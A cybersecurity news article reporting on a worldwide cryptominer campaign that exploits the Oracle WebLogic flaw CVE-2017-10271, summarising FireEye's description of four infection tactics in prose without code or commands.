Threat Management, Threat Management, Malware, Vulnerability Management

Cryptominer campaign leveraging Oracle bug spreads worldwide via multiple infection tactics


A malicious campaign that's been exploiting a vulnerability in Oracle's WebLogic application servers in order to install a Monero cryptominer on victims' machines has reportedly used at least four different infection chain tactics to spread the threat worldwide, across virtually all industry sectors.

The campaign has already impacted organizations in the U.S., Australia, Hong Kong, India, Malaysia, the U.K., and Spain, according to a Feb. 15 blog post authored by FireEye researchers Rakesh SharmaAkhil Reddy, and Kimberly Goody

The bug, CVE-2017-10271, is a remote code execution bug that also affects PeopleSoft HR and Oracle E-Business Suite software. And while it was patched late last year, server owners who have failed to implement it remain vulnerable to the exploit, which FireEye reports can result in a cryptominer infection, executed via one of at least four separately observed tactics.

One method uses PowerShell to download the miner directly onto a victimized system, and ShellExecute to execute the program. Alternatively, the exploit can deliver a PowerShell script that downloads the miner from a remote server. For machines operating on Linux OS, there is another possibility: the exploit may deliver shell scripts that download and execute the cryptominer. And a fourth tactic utilizes dumped Windows credentials, the credentials-extracting tool Mimikatz, and the EternalBlue Windows SMB server exploit to spread laterally.

The campaign appears to be similar to one that was reported last month by Morphus Labs' Chief Research Officer Renato Marinho and SANS Technology Institute Dean of Research Johannes Ullrich, who said the same Oracle bug was used to deliver the XMRig cryptominer.

"There were multiple campaigns that leveraged the CVE-2017-10271 to subsequently distribute cryptocurrency miners. In this sense, [our blog post] wasn't specific to a singular campaign, but rather a more cohesive look at the different tactics that we observed following exploitation of that vulnerability," said FireEye senior analyst Kimberly Goody in an email interview today with SC Media. "With that said, based on a quick review of the indicators in the SANS blog, those campaigns appear to be different from activity sets that we were specifically referring to. We still are observing threat actors leverage CVE-2017-10271 to subsequently download cryptocurrency mining payloads as of a few hours ago."

Bradley Barth

As director of multimedia content strategy at CyberRisk Alliance, Bradley Barth develops content for online conferences, webcasts, podcasts video/multimedia projects — often serving as moderator or host. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.